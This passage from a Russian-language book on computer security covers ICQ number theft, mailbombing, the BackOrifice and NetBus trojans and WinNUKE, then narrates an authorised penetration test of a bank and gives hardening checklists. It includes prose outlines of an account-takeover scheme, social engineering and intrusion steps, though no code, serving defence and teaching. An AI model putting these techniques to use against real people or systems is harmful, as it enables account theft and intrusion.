на нужный экран. Похожая служба действует по адресу wwwicqphone.ru.
На многих сайтах «живут» полезные программы, дополняющие и расши-
ряющие«Аськины» возможности. Так, программа ICQ gateway for word
97 помогает бороться с безграмотными сообщениями. Это расширение
дает возможность отправлять выделенный текст по ICQ прямо из Word'a
с уже проверенной орфографией. Есть и обширные списки пользователей
- среди них «городок», где легко отыскать новых друзей в определенном
городе. А если вас перестало удовлетворять заочное общение с помощью
текстов и вы хотите взглянуть на собеседника, к вашим услугам
фотогалереи пользователей ICQ - например, «Увидим друг друга». Говорят,
такое развитие онлайновой дружбы порой ведет к более серьезным
отношениям, и уже есть примеры переезда к любимому человеку из
Москвы на Урал.
«Аська» давно уже не одинока. Под впечатлением ее успехов ряд
фирм приступил к выпуску программ-коммуникаторов с аналогичными
или даже усовершенствованными функциями.
Интенсивное развитие «Аськи» и других программ прямого общения
продолжается. В какой мере всем этим богатством пользоваться и
пользоваться ли вообще, пусть каждый решает сам. И, надеемся, женская
часть нашей аудитории не будет подозревать любимого в измене
лишь потому, что кто-то спросит номер его «Аськи» - ну не Наташки же,
в конце концов!
Глава 9.
Компьютерные атаки: стратегия обороны
Речь пойдет о трех основных видах сетевых агрессий, возможных
при работе с ICQ, электронной почтой и, собственно, при подключении
к Internet.
Хакерские трюки 173
Торговля UIN каквидбизнеса
В последние годы Internet-пейджер ICQ не перестает удивлять
пользователей своими великолепными коммуникационными возможностями.
Однако радость от общения может быть омрачена некоторыми
проблемами безопасности, большинство из которых удастся избежать,
соблюдая элементарные правила при инсталляции программы на свой
компьютер.
Как известно, уникальные идентификационные номера (UIN,
Unique Identification Number) ICQ распределяются по простому хронологическому
принципу: кто позже подключился, у того и номер больше.
Число владельцев популярного сетевого пейджера, ныне сопровождаемого
компанией America Online, ежедневно увеличивается, поэтому бытует
мнение, что номер ICQ свидетельствует об опыте работы пользователя
в Сети и его компетентности в вопросах Internet-технологий.
Например, шестизначный номер говорит о том, что владелец сего сокровища
- профессионал со стажем, несомненно заслуживающий доверия
у всех остальных. Ну, а если номер восьмизначный и трудно запоминаемый,
то наверняка его обладатель подключился к Internet совершенно
недавно, а значит, является неофитом в сетевом сообществе.
Высказывания более чем спорные, что, впрочем, не мешает появлению
таких сайтов, как wwwuinforsale.com, - его авторы на заглавной
странице в безапелляционном тоне утверждают примерно то же самое и,
кроме того, добавляют: «. ..Прописная истина: отношение к новичкам совершенно
другое, чем к опытным пользователям Internet. Все вышесказанное
касается не только отдельных клиентов, но и фирм в целом,
поэтому нужно непременно заботиться о репутации своих компаний
в Сети».
Честно говоря, еще не приходилось слышать о фирме, солидность
которой ставилась бы под сомнение из-за номера ICQ, однако оставим
подобные заявления на совести авторов, научившихся зарабатывать
деньги путем продажи коротких и легко запоминаемых U1N. В контексте
данной темы нас более всего интересует security-аспект приобретения такого
номера.
Итак, какие же действия предпринимают агрессоры для того, чтобы
узнать заветную комбинацию цифр? На самом деле все очень просто.
Каждому владельцу Internet-пейджера известно о такой возможности
приложения, как добавление новых клиентов. При этом поиск по базе
данных ICQ может осуществляться по имени, адресу электронной почты
или UIN пользователя. Эти сведения являются обязательными при регистрации
на сервере Mirabilis и поэтому всегда доступны каждому поклоннику
«тети Аси».
174 Хакерские трюки
Основным параметром здесь, конечно же, является
e-mail, так как для присвоения чужого номера в регистрационную форму
нужно ввести UIN и пароль пользователя. Но если с U1N ситуация
понятна, то пароль можно получить лишь через страницу wwwicq.com/
password, что весьма затруднительно, разве что пользователь был достаточно
неосторожным и позволил установить в своей системе «троянского
коня» или key logger (программу, созданную неким «доброжелателем»,
которая контролирует работу клавиатуры и записывает данные обо всей
введенной информации в отдельный файл).
Если при регистрации ICQ указан адрес электронной почты, присвоенный
вам надежным и проверенном в деле провайдером, то считайте
свой случай более-менее безопасным. Если же в регистрационной форме
числится адрес какой-то бесплатной службы, тут сетевые «джентльмены
удачи» начинают довольно интересную «игру». От вашего имени множе-
ству клиентов рассылаются сообщения рекламного, а порой и откровенно
порнографического содержания. После нескольких тысяч таких писем
некоторые пользователи (а иногда и сам агрессор), естественно,
возмутятся подобным нарушением сетевого этикета, о чем не замедлят
сообщить компании, предоставляющей услуги бесплатной почты.
В результате ваш адрес, скорее всего, удалят без каких-либо предупреждений
(кстати, довольно недвусмысленные высказывания касательно
рассылки рекламной информации содержатся в Service Agreement
практически каждого бесплатного сервера). Без какого-либо промедления
точно такой же адрес e-mail будет зарегистрирован на имя вашего
«доброжелателя», который с помощью службы Forgotten Password на сайте
ICQ добудет «забытый пароль» на все тот же значащийся в системе адрес
электронной почты, однако уже принадлежащий другому человеку.
Существуют ли какие-то меры противодействия подобным атакам?
Как уже было сказано выше, указание адреса, выданного провайдером,
существенно уменьшает возможность закрытия почтового ящика
по не зависящим от вас причинам. Будет также не лишним установить
обязательную авторизацию для всех, кто желает добавить ваше имя или
ник в свой Contact List. Кроме того, не ведите пространных бесед с незнакомыми
людьми, особенно когда они предлагают вам выслать инте-
ресные файлы или нужные приложения.
Тяжелая артиллерия
Атаки по e-mail на сегодняшний день особенно неприятны для
пользователей бесплатных почтовых услуг (из-за ограничения объема
почтового ящика), а также для тех, кто подключается к Internet по коммутируемой
телефонной линии (как известно, время - деньги).
Хакерские трюки 175
Почтовая бомбардировка, или mailbombing, является одним из самых
примитивных видов компьютерных агрессий и практически не применяется
высококлассными взломщиками. При такой атаке на электронный
адрес пользователя отсылается большое количество
сообщений. Ее главная цель, как правило, - засорение ящика или вынужденное
«зависание» сервера провайдера, пытающегося справиться со
всем этим «хламом», поступающим в адрес жертвы.
Практически любой пользователь, мало-мальски знакомый с основами
работы в Internet, может стать автором такой агрессии. Для примера
рассмотрим одну из самых распространенных программ подобного
типа - The Unabomber. Как видно из ее интерфейса, все, что требуется
знать потенциальному террористу, - это адрес сервера, позволяющего
анонимную отправку сообщений электронной почты, и адрес жертвы.
После ввода какого-либо текста в поля Subject и Message и нажатия кнопки
Begin Mailing программа начнет отсылку почтовых сообщений. Количество
отправленных писем указывается в поле Number и может задаваться
фактически любым 12-разрядным числом.
Как же уберечься от почтовых атак? Прежде всего, напомним, что
применять такую программу будут «горе-специалисты по хакингу», уровень
знаний которых оставляет желать лучшего. Поэтому противодействием
номер один должно стать элементарное правило: четко осознавать,
кому и зачем вы сообщаете свой электронный адрес.
В качестве преграды для мэйлбомбинга может выступать
и Web-сайт провайдера, иногда настраиваемый таким образом, чтобы он
автоматически определял почтовые атаки. В большинстве случаев они
распознаются сервером посредством сравнения исходных IP-адресов
входящих сообщений. Если количество сообщений из одного источника
превышает некие разумные пределы, то все они автоматически поступают
в Recycle Bin на сервере. Конечно же, ничто не мешает злоумышленнику
фальсифицировать собственный IP-адрес, однако те, кто в силах
совершить подобное, наверняка не станут прибегать к такому примитивному
способу атаки.
Приложение BombSquad поможет расчистить почтовый ящик после
совершения нападения. Вместо загрузки всех сообщений программа
доставит лишь определенное количество писем. Проведя их сортировку,
вы сможете отделить нужную почту от mail-бомб сетевого террориста.
Для тех, кто предпочитает читать заголовки электронных писем на сервере
перед загрузкой почты на жесткий диск, существует возможность удаления
всех лишних сообщений без доставки на свой компьютер. Однако
при большом количестве почты такой способ вряд ли удобен. Хочется
также напомнить, что, согласно украинскому и российскому законода-
176 Хакерские трюки
тельствам, почтовые атаки могут быть расценены как уголовные преступления.
В Соединенных Штатах подобные действия, повлекшие за
собой срыв работы сервера провайдера, считаются федеральными преступлениями
и передаются на рассмотрение в ФБР.
И вновь продолжается бой!
Естественно, все рассмотренные выше виды Internet-агрессий могут
доставить пользователям определенные проблемы, однако ни кражу
UIN, ни почтовую бомбардировку нельзя расценивать как серьезное покушение
на вашу компьютерную систему. Атаки профессиональных
взломщиков имеют более изощренный характер, при этом учитывается
психология жертвы, активно используется информация о спецификации
протоколов TCP/IP, на которых построена Internet. Далее мы расскажем
о том, как подобным действиям можно противостоять.
Согласно Бюллетеню лаборатории информационных технологий
NIST, наиболее популярными атаками на пользовательские машины
считаются:
• установка вируса на компьютер жертвы с помощью
передачи файла по ICQ;
• применение BackOrifice и NetBus - продуктов различных
хакерских групп, позволяющих получать неограниченный
доступ к удаленной системе, если на ней установлен
«троянец»;
• переполнение рабочего телекоммуникационного канала
пользователя путем отсылки ему огромного количества
TCP-пакетов с пометкой «срочно» с помощью WinNUKE.
Теперь более подробно остановимся на каждой из них.
Программы BackOrifice и NetBus, будучи установленными на компьютер,
открывают удаленный доступ к файлам для тех, кто заранее позаботился
о «прописке» этих «творений» в вашей системе. Обе они подобны
мелкому воришке, который проник в чужой дом и спрятался под
кроватью, чтобы потом, когда наступит ночь, открыть двери более серьезным
и маститым бандитам. BackOrifice, например, заносится в директорию
Windows, откуда легче всего получить доступ к важным системным
файлам. BackOrifice и NetBus сегодня обнаруживают
и обезвреживают практически все антивирусные пакеты.
Существуют также и другие программы, способные защитить вашу
систему от подобных «троянских коней».
Хакерские трюки 177
Утилита NOBO (ее название происходит от «No BackOrifice») непрерывно
контролирует соответствующие порты на предмет поступления
в систему данного вируса, хотя в общем она реагирует на любого рода
«подозрительные» пакеты. При этом NOBO выдает сообщение о
получении блока данных неизвестного происхождения и тут же закрывает
порт, предотвращая тем самым возможность продолжения атаки. Затем
программа записывает в log-файл данные об IP-адресе агрессора (которые
могут быть сфальсифицированы, но это уже совсем другая
история). В случае повторения инцидента эту информацию нужно предоставить
своему провайдеру.
Программа BODetect проверит все ваши жесткие диски на наличие
BackOrifice. Таким образом, комбинацией этих двух утилит удобно пользоваться
при частой работе в Internet: с одной стороны, вы можете контролировать
движение пакетов к вашему компьютеру, с другой - периодически
запускать антивирус, наученный распознавать именно BackOrifice.
Сканеров портов, препятствующих проникновению в вашу систему
другого, не менее опасного «троянского коня» NetBus, также суще-
ствует довольно много. Пакет NetBuster, например, прекрасно справится
с этой задачей. Более того, при атаке на ваш компьютер NetBuster будет
умышленно отвечать на запросы агрессора, создавая тем самым впечатление,
что вирус надежно установлен на вашем ПК. В итоге время, потраченное
взломщиком на безуспешные попытки получить доступ к
компьютеру «жертвы», увеличится, что, в свою очередь, может помочь
специалистам найти реальный источник угрозы и идентифицировать
компьютер, с которого производится атака.
И наконец, еще один вид компьютерной агрессии, заслуживающий
отдельного разговора, - атомная атака, или просто «ньюкинг»
(nuking). Программы такого рода, используя некоторые ошибки
Windows, отсылают на адрес жертвы большое количество срочных пакетов,
что в конечном итоге приводит к «зависанию» компьютера, а в некоторых
случаях и к повреждению его системных файлов. Основная опасность
подобных программ заключается в их разрушительной силе и в то
же время простоте использования.
Потенциальному террористу для атаки через Internet с помощью
WinNUKE нужно знать только ваш IP-адрес.
Какие же меры противодействия следует предпринять в данном
случае? Прежде всего старайтесь, чтобы ваш IP-адрес был известен как
можно меньшему кругу людей. Основные каналы утечки информации об
IP-адресе - чаты и ICQ. Что касается «тети Аси» - позаботьтесь о том,
чтобы во вкладке Security в поле IP всегда появлялась надпись «N/A»
(Not Available - недоступно).
178 Хакерские трюки
Кроме того, обратите внимание, насколько легко ваше имя может
добавить в свой список другой пользователь ICQ. Не будет лишним ограничить
круг потенциальных друзей. Хотя все эти меры довольно-таки
косметические... Существуют программы, способные распознавать
IP-адрес даже тех владельцев ICQ, которые предприняли все меры предосторожности.
Именно поэтому в большинстве серьезных компаний
использование данной популярной программы запрещено.
Но даже если террористу удалось завладеть IP-адресом, что, как
мы убедились, сделать весьма несложно, это еще вовсе не является
«окончательным приговором» вашей системе. «Атомных атак» поможет
избежать программа Nuke Nabber. Она непрерывно сканирует открытые
порты компьютера, подключенного к Internet, и перехватывает пакеты,
используемые для атаки. Желающие побольше узнать об этой технологии
могут почитать ответы на часто задаваемые вопросы по применению
Nuke Nabber. Программа распространяется как freeware, после инсталляции
ярлык на нее желательно установить в папку Автозагрузка меню
Пуск, для того чтобы каждый раз при загрузке компьютера Nuke Nabber
запускалась автоматически.
Многие, возможно, спросят: зачем нужно было приводить названия
программ, предназначенных для компьютерных атак? Ведь в руках
агрессивно настроенного пользователя они станут настоящим оружием и
приведут к нежелательным последствиям, тем более что принципы использования
упомянутых приложений, как мы успели убедиться, могут
озадачить разве что дошкольника. Однако, как говорил Суньцзы в трактате
«Искусство войны»: «Тот, кто знает врага и знает себя, не-окажется
в опасности и в ста сражениях. Тот, кто не знает врага, но знает себя, будет
то побеждать, то проигрывать. Тот, кто не знает ни врага, ни себя, неизбежно
будет разбит в каждом сражении».

Глава 16.
Анатомия дружеского взлома
Тому, кто хочет узнать, насколько хорошо защищен его Web-сервер,
можно посоветовать весьма надежное средство: нанять хакера и попросить
его взломать защиту. Этот способ сослужил отличную службу
одной финансовой организации, собиравшейся проводить банковские
операции с помощью Web-технологий. Компания наняла специальную
группу, которая нашла «дыры» в системе защиты, прежде чем услуга была
представлена публике. Тем самым удалось уменьшить риск проникновения
электронного воришки в систему, где хранятся чужие деньги.
Расскажем о реальном опыте одного из сотрудников, работавших
в банковской сфере. Названия, имена и прочие детали изменены таким
образом, чтобы организацию нельзя было «вычислить». Во всем остальном
история правдива.
Состояние Джеймса Фоллсворта, вице-президента по безопасности
Big American Bank, было близко к паническому. Он только что выяснил,
что его банк собирается внедрять систему услуг для удаленных клиентов
на базе Web; услугой предполагалось охватить несколько
миллионов человек по всему миру. Служба BABank Online должна была
предоставить удаленным клиентам возможность знакомиться с состоянием
счетов, выполнять переводы и платежи и управлять движением
своих средств.
Фоллсворт не понимал, почему его никто не предупредил о разработке
проекта, который ставил колоссальное количество проблем перед
службой безопасности. Уже началось бета-тестирование программы; до
внедрения новой онлайновой услуги оставалось не больше двух месяцев.
Президент BABank решил, что Фоллсворта просто «заклинило», и пред¬
ложил ему как можно скорее найти выход из ситуации.
Необходимо было срочно оценить, насколько безопасна система
BABank Online. Ведь достаточно даже не злоумышленного «взлома» системы,
а просто Web -хулиганства, чтобы клиент потерял доверие к услуге,
а банк лишился части дохода. Последовало решение: нанять компанию,
206 Хакерские трюки
сотрудники которой попытаются проникнуть в систему извне и тем самым
определят слабые места в ее защите. Фоллсворт заключил контракт
с такой фирмой, и они начали работать в тесном контакте. Он старался
объяснить, в чем состоит задача экспериментального проникновения,
или, если можно так выразиться, «дружественного» взлома. Предстояло
оценить целостность новой услуги и определить, как эта услуга соотносится
с прочими банковскими операциями; выявить слабые места; предложить
решения по улучшению защиты; продемонстрировать возможные
последствия взлома.
Разработка планов вторжения
При моделировании атаки необходимо определить, кто является
потенциальным злоумышленником. Большинство компаний представляет
себе в этом качестве какого-нибудь профессионального преступника,
иностранную державу, шпиона, конкурента-террориста или просто
16-летнего подростка, развлекающегося с клавиатурой. Фоллсворт сказал,
что более всего боится международных преступников, действующих
из корыстных побуждений. После этого было решено, как надо проводить
«дружественный» взлом сетей и Web-узлов BABank.
Бесспорно, многое зависит от того, насколько далеко готов зайти
потенциальный хакер. Для получения информации, которая может оказаться
полезной при взломе, часто используются разнообразные психологические
приемы. Например, преступник звонит в офис и мило расспрашивает
сотрудников о преимуществах нового пакета услуг, попутно
задавая вопросы относительно системы безопасности.
Другой часто встречающийся прием - разгребание мусора. Очень
часто сотрудники компаний довольно легкомысленно выбрасывают внутренние
телефонные справочники, техническую документацию, диски
и многое другое. Это же настоящая золотая жила для злоумышленника!
Были произведены попытки войти в систему разными способами.
Доступ можно получить через телефонную систему, порты для технической
поддержки и прочие электронные «форточки». Не игнорировались
и психологические штучки, «взломщики» прикидывались по телефону
то сотрудниками компании, то поставщиками. В корпоративном мусоре
они тоже покопались, но занимались этим только за пределами организации.
Запрещенными считались: психологические приемы с использованием
электронной почты, разгребание мусора на территории организации,
выдавание себя за сотрудника банка при личном контакте, а также
попытки проникновения в системы бизнес-партнеров банка.
Исключались и более грубые методы, вроде вымогательства, силового
Хакерские трюки 207
давления, шантажа и копания в биографиях сотрудников банка. Часть из,
этих «методов» была отклонена по соображениям законности, на другие
не согласилась служба безопасности банка. К сожалению, все эти ограничения
помешали «взломщикам» полностью смоделировать действия
потенциальных злоумышленников.
Кстати, и само хакерство - деяние противозаконное; иногда оно
даже преследуется в уголовном порядке. Поэтому не забудьте выдать нанимаемой
вами компании письменное разрешение на все предпринимаемые
действия. Если какие-то действия группы, оценивающей систему
безопасности, будут выявлены (правда, вероятность этого мала), неверно
поняты и зарегистрированы как правонарушение, эта бумага поможет
приглашенным хакерам избежать неприятностей. Ясно, впрочем, что ни
одна компания не разрешит сторонней организации вторгнуться в свою
вычислительную сеть.
Разумный хакер собирает информацию любыми доступными
средствами - в ход идут, например, открытые документы, финансовые
отчеты, техническая документация. Хакеры собирают данные об используемых
операционных системах, продуктах, являющихся основой информационной
системы, телефонных станциях, а также физические адреса
центров хранения данных и телефонных узлов. Чтобы сэкономить
время и деньги, BABank сам передал всю эту информацию рабочей группе
(«взломщикам»).
Бесспорно, добросовестный хакер сделает все возможное, чтобы
максимально приблизиться к объекту атаки. Фоллсворт открыл на имя
фирмы-«взломщика» легальный банковский счет на сумму 1000 долларов.
С этим счетом фирма могла работать по телефону или через пилотный
Web-узел, к которому имело доступ ограниченное число работников
банка.
Найти ахиллесову пяту
Покончив с предварительными изысканиями, группа злоумышленников
начинает составлять схему сети. Указываются IP-адреса, физическое
размещение устройств, порты для управления устройствами и
связи через коммутируемую сеть, телефонные номера, модули голосового
ответа, сети под SNA, серверы, поддерживающие услуги Routing and
Remote Access Service от Microsoft, маршрутизаторы и прочие точки, где
происходит аутентификация удаленных абонентов.
В составлении такой карты значительную помощь могут оказать
некоторые широко распространенные методы и средства анализа. Например,
порывшись как следует на Web-узле InterNIC, можно получить
массу информации о структуре IP-сети компании. Существуют специ-
208 Хакерские трюки
альные программы-«демоны», которые автоматически перебирают десятки
тысяч телефонных номеров, реагируя только на тоновые сигналы
от модемов, - таким образом можно определить, что трубку на противоположном
конце «снял» компьютер. Анализатор протоколов позволяет
ознакомиться с трафиком, передаваемым по обнаруженным IP-каналам
организации. Проникнув в сеть, хакер способен применить анализаторы
протоколов для слежения за трафиком и перехвата паролей.
Группа оценки системы защиты обязательно должна вести учет
всех своих действий. Если выяснится, что на систему оказывается вредное
воздействие, контрольной журнал поможет разобраться в произошедшем
и устранить последствия такого вмешательства.
Следующий шаг состоит в том, чтобы проанализировать масштаб
IP-области, связанной с компанией (т.е. узнать, имеет она IP-адрес класса
В или С); это можно сделать при помощи InterNIC или любого другого
средства. Например, воспользовавшись командой nslookup, можно
выяснить, какие IP-адреса можно атаковать. Затем необходимо зайти по
telnet на Unix-машину, на которой была установлена программа Sendmail
5.x, в чьей системе защиты имеется ряд дыр; через них можно попытаться
проникнуть на почтовый сервер.
Обнаружилось, что системный оператор не входил в систему уже
19 дней; это было расценено как недостаток системы защиты. Выяснилось
также, что в настоящий момент в системе работают два человека;
необходимо было дождаться, пока они выйдут, и только тогда начать атаку.
Кроме того, была запущена специальная программа, которая помогла
скрыть свои настоящие IP-адреса и имена.
Для поиска других слабых мест в системе защиты были использованы
средства оценки надежности защиты данных Internet Scanner от
Internet Security Systems и бесплатная программа Satan. Сгодятся и другие
программы, например Netective от Netect, Ballista от Secure Networks и
NetSonar от Wheel Group. Многие из этих программ можно бесплатно загрузить
через Internet.
У каждого из продуктов есть свои достоинства и недостатки, поэтому,
чтобы прикрыть все «дыры», стоит запастись несколькими программами.
Эти средства помогут найти плохо сконфигурированные серверы,
маршрутизаторы с «дырами», проблемы в системной базе (registry)
Windows NT, неправильно сконфигурированные операционные системы,
неустановленные протоколы, слабые пароли, неправильные версии
программного обеспечения и устаревшие «заплаты».
Было опробована и парочка психологических приемов. Прикинувшись
инженером из компании-производителя, сотрудник фир-
Хакерские трюки 209
МЫ-«взломщика» пару раз позвонил в группу разработки информационных
систем BABank и получил данные о структуре сети банка. Кроме того,
удалось раздобыть довольно подробные данные о работнике банка;
потом один из «взломщиков» притворился этим работником, получив в
свое распоряжение дополнительные средства доступа к электронным
ресурсам.
Вооружившись результатами сканирования, информацией из открытых
источников и данными, полученными с помощью психологических
приемов, «взломщики» полностью подготовились к штурму информационной
системы BABank. Бесспорно, самым серьезным моментом
операции была именно попытка взлома. Нужно быть очень внимательными,
чтобы не нанести серьезного ущерба системе защиты данных.
В таких делах следует избегать легковесных подходов: аккуратно проникнуть
в систему куда труднее, чем запустить средство сканирования
сети и составить отчет.
Взлом
«Взломщики» воспользовались слабостью парольной защиты, обнаруженными
старыми версиями почтовых программ (чьи хорошо известные
«дыры» в системе защиты так и не были залатаны), telnet-доступом
к незащищенным портам. Кроме того, они загружали по FTP файлы с
паролями и меняли их. Может быть, кому-то покажется, что все это чересчур
просто, однако большинство «дыр» защиты связано именно с тем,
что в организации отсутствует практика каждодневного выполнения не-
ких немудреных операций.
В корпоративную сеть можно войти через сервисы TCP/IP, порты
управления на включенных в сеть компьютерах и офисных АТС, прини-
мающих участие в передаче данных. Можно также воспользоваться дополнительными
средствами, выявленными на этапе исследования сети.
Что касается сети BABank, были выявлены две слабые точки.
Во-первых, порт технического обслуживания AS/400 был закрыт паролем,
установленным производителем по умолчанию; в результате была
получена возможность делать с этой системой все что угодно. Во-вторых,
на почтовом сервере имелась устаревшая версия Unix, на которую не установили
необходимые заплаты. Там обнаружилось несколько дыр; в
частности, можно было отправлять почту и записывать файлы в корневой
уровень каталога. Таким образом, был получен контроль над этим
сервером, после чего можно было взаимодействовать с другими серверами
на административном уровне.
Далее потребовалось составить себе представление о внутренней
инфраструктуре сети. Чтобы обнаружить слабые места, «взломщики»
210 Хакерские трюки
воспользовались средствами автоматического взлома паролей. Выяснилось,
что недостаточно надежно защищены система управления приложениями,
средства системного управления, системные утилиты, а также
средства управления операционными системами на корневом уровне.
Вот пример того, почему система оказывается недостаточно надежной.
Предположим, что внешний канал TCP/IP приходит на Сервер
1, работающий под Windows NT. Остальные семь серверов (со второго
по восьмой) могут взаимодействовать с внешним миром только
через Сервер 1; следовательно, этот сервер «перекрывает» единственный
путь проникновения в систему извне. Администраторы часто думают,
что для обеспечения безопасности системы нужно лишь закрыть к
ней доступ снаружи. На защиту внутренних каналов передачи информации
обращают куда меньше внимания, что значительно облегчает жизнь
хакеру.
Телефонное хулиганство
Не забудьте выяснить, насколько надежно защищена ваша корпоративная
АТС. У нее вполне могут обнаружиться недокументированные
каналы связи с сетью передачи данных, что откроет путь потенциальным
злоумышленникам. К счастью для BABank, здесь далеко продвинуться
не удалось.
Проникновение в РВХ или системы голосового ответа дает массу
ценной информации о портах доступа, прямого администрирования извне
и технического обслуживания, о внутренних прикладных системах с
распознаванием голоса, а также о службе передачи голосовой почты
в РВХ. Таким образом, хакер может получить доступ к банковским счетам
и системам управления.
Чтобы уберечь РВХ от проникновения хакера, нужно поменять
все пароли по умолчанию и изучить все контрольные журналы, составив
представление о нормальном режиме работы АТС. Проверяйте все модификации
программного обеспечения и системные «заплаты» на предмет
того, не способствуют ли они возникновению новых слабых мест. Необходимо
также убедиться, что в вашей системе нет каких-нибудь неизвестных
вам модемов. Помните: система, в которой случайно окажутся
модем и ПК под Remote Server Mode, будет полностью открыта для
вторжения извне.
Воспользовавшись программой автоматического подбора номера,
«взломщики» обнаружили некоторое число модемов в телефонном пространстве
банка. Они попытались «влезть» в эти модемы и проверить их
защиту. Часть модемных входов была закрыта паролем. Запустив программу
подбора пароля, чтобы проверить, насколько сильна эта защита,
Хакерские трюки 211
«взломщики» ничего не добились. Зато им удалось вручную(!) подобрать
пароль к порту технической поддержки маршрутизатора. Бабах!
Через этот порт они попали в сеть, а потом, зайдя на AS/400, перевели
небольшую сумму на свой тысячедолларовый счет с чужого счета..
Если «взломщики» сумели это сделать, то что помешает хакеру перевести
миллион долларов? Или миллиард? Однако теперь, ориентируясь на
результаты этих изысканий в области психологических приемов, BABank
установил некую предельную сумму сделки, при превышении которой
вступают в действие механизмы обнаружения финансового мошенничества.
Проникнув на AS/400, «взломщики» получили доступ к мэйнфреймам
и начали атаку на систему защиты Resource Access Control Facility.
Но тут сотрудники BABank, уже убедившиеся в наличии «дыр»
в Web-системе, решили прекратить эксперименты.
Как обычно, «взломщики» победили. Однако на этом их деятель-
ность не закончилась. Был выработан ряд стратегических рекомендаций
и даны советы по использованию конкретных процедур, методов и технологий,
которые помогут решить проблемы с защитой данных.
Так, банку были даны рекомендации по выработке политики в области
Web-безопасности и реализации метода поиска слабых мест. Кроме
того, было указано, как можно связать между собой различные схемы
парольной защиты и добиться оптимального выбора паролей. Был дан
совет сотрудникам отдела автоматизации установить новые версии некоторых
операционных систем и перевести определенные системы с Unix
на Windows NT, поскольку ряд приложений лучше работает под NT.
Главное изменение состояло в том, чтобы вывести часть услуг на
отдельные серверы, повысив тем самым степень защиты. Если услуги типа
FTP и размещения Web-серверов сосредоточены на одной машине,
это снижает уровень информационной безопасности.
Фоллсворт, впрочем, оказался достаточно разумным, чтобы осознать:
одних этих мер недостаточно для обеспечения неуязвимости информационной
системы банка. Было проверено, как защищена конфиденциальность
информации, насколько хорошо обеспечивается
целостность данных и как устроена система управления доступом, однако
из рассмотрения выпал такой важнейший аспект информационной
безопасности, как готовность системы.
BABank намеревался предоставлять Internet-услуги для получения
дополнительного дохода и укрепления доверия клиентов. Для этого сервер
должен работать без перерывов и выходных. Если в результате атаки
212 Хакерские трюки
хакера обслуживание прервется, то, несомненно, пострадают как финан-
совые дела BABank, так и его отношения с клиентами. Мало того, следы
Web-хулиганства на сервере способны «подпортить» имидж самой компании,
ее продуктов и услуг, в особенности если на деловых страничках
появятся порнографические картинки.
Группа «взломщиков» решила выяснить, насколько легко хакер
сумеет вызвать на Web-сервере BABank перебои в обслуживании. Для
этого они воспользовались разнообразными самодельными средствами
(ничего другого как-то не нашлось). Некоторые разработанные хакерами
программы, вызывающие сбои обслуживания, можно загрузить по
Internet, однако чтобы заставить их работать, с ними приходится долго
возиться.
Они применяли почтовые бомбы для переполнения сети, затопление
сети пакетамисинхронизации(8Уflooding), а также«пингсмерти»,
т.е. нападение с использованием пинг-пакетов, иногда приводящее к зависанию
серверов. Обязательно попросите группы оценки информационной
безопасности исследовать устойчивость к искусственным перебо-
ям в обслуживании; такие атаки могут полностью вывести сервер из
строя. Необходимо также выяснить, сколько времени занимает восстановление
работоспособности системы.
Экзамены никогда не кончаются
Когда нанятым хакерам удалось взломать систему, ваша работа
только начинается. Ни в коем случае не следует считать, что сам факт тестирования
уже обеспечивает информационную безопасность. Оценка
системы безопасности (вроде той, что была предпринята по заказу
BABank) дает только представление о состоянии сети на момент проведения
операции. Система информационной безопасности претерпевает
постоянные изменения и требует к себе постоянного внимания.
Первый всеобъемлющий тест должен рассматриваться вами как
отправная точка. Не забывайте время от времени выделять деньги на повторные
обследования. Не менее важно и то, чтобы исследования прово-
дились до запуска онлайновых услуг, а не после того, как «дыры» в защи-
те дадут себя знать.
Не забывайте девиз «Взломай свою систему сам, пока кто-то не
сделает этого без твоего ведома». А пока - удачной охоты!
Хакерские трюки 213
Десять советов по защите серверов для
Web-коммерции
1. Следует ограничить число людей, имеющих удаленный доступ
к управлению вашим Web-сервером, и тщательно следить за этим доступом.
Дистанционное администрирование (как и доступ к корневому каталогу)
- отличная лазейка для хакера.
2. Проверьте, правильно ли сконфигурированы списки доступа
и вносятся ли в них каждодневные изменения, отражающие состояние
деловой жизни компании (такие, например, как добавление новых пользователей
и клиентов, удаление старых ).
3. Насколько возможно, отделите ваш коммерческий сервер от
прочих услуг. Можно дополнительно укрепить сервер, отменив все необязательные
функции приложений и операционных систем. Если вы не
в состоянии этого сделать, следует всерьез подумать об использовании
сторонних услуг (outsourcing).
4. Установите систему обнаружения вторжений, которая немедленно
будет ставить в известность администратора сети обо всех
проблемах, требующих устранения. Помните, что обнаружить хакера -
это полдела; главная задача состоит в пресечении его деятельности.
5. Система должна реагировать на любые необычные события,
происходящие на серверах. Невозможно остановить злоумышленника,
не зная, что он делает.
6. Неправильно написанные, сконфигурированные и установленные
скрипты Perl и CGI (Common Gateway Interface) могут стать причиной
возникновения «дыр» в системе защиты. Этими средствами надо
пользоваться осторожно; все скрипты должны проверяться опытными
специалистами.
7. Для обеспечения безопасности некоторых коммерческих серверов
использования паролей недостаточно. Стоит обдумать возможность
раздачи клиентам физических и электронных жетонов.
8. Следует обеспечивать и аутентификацию администраторов.
Все большее распространение получают разнообразные биометрические
средства идентификации по голосу, отпечаткам пальцев и узору сетчатки.
9. При переводе денежных сумм (с использованием кредитных
карточек или путем обращения к мэйнфрейму, где поддерживаются полномасштабные
банковские операции) ваш узел обращается к другим сетям.
При взаимодействии с критически важными системами следует
214 Хакерские трюки
применять такие средства обеспечения безопасности, как Secure Socket
Layer, Secure Hypertext Transfer Protocol или Kerberos.
10. Подумайте, не стоит ли снабдить критически важные данные
и соответствующие им системные файлы оболочками для обеспечения
их целостности. Криптографические оболочки вокруг этих файлов позволят
не допустить их модификации или внесения вредоносного кода.
Как работать с группой, оценивающей
надежность системы информационной
безопасности
• Выберите себе консультанта с хорошей репутацией.
• Потребуйте, чтобы в группе велись подробные
контрольные журналы в течение всего срока работ.
• Необходимо, чтобы группа оценки могла приостановить
свою деятельность за несколько минут, если начнет
происходить нечто нежелательное.
• Группа должна выдать несколько различных отчетов,
рассчитанных на технических специалистов,
руководителей среднего звена и высшее руководство
компаний.
• Ознакомьтесь с результатами проверки и используйте
их как руководство к действию.
Десять недорогих способов укрепления системы
обеспечения внутренней безопасности
1. Стоит выяснить о нанимаемых на работу людях несколько больше,
чем можно узнать из их резюме; особенно это касается таких критически
важных должностей, как системный администратор. Подумайте,
не надо ли ввести систему психотестов, которые позволят выявить этические
принципы кандидатов, их особенности.
2. Рассмотрите вопрос о снятии дисководов с пользовательских
ПК. Это затруднит сотрудникам установку своего собственного программного
обеспечения и компьютерных игр, помешает им заражать систему
вирусами и «выносить» из компании закрытую информацию. Такая
мера позволит избежать и еще одной угрозы для информационной
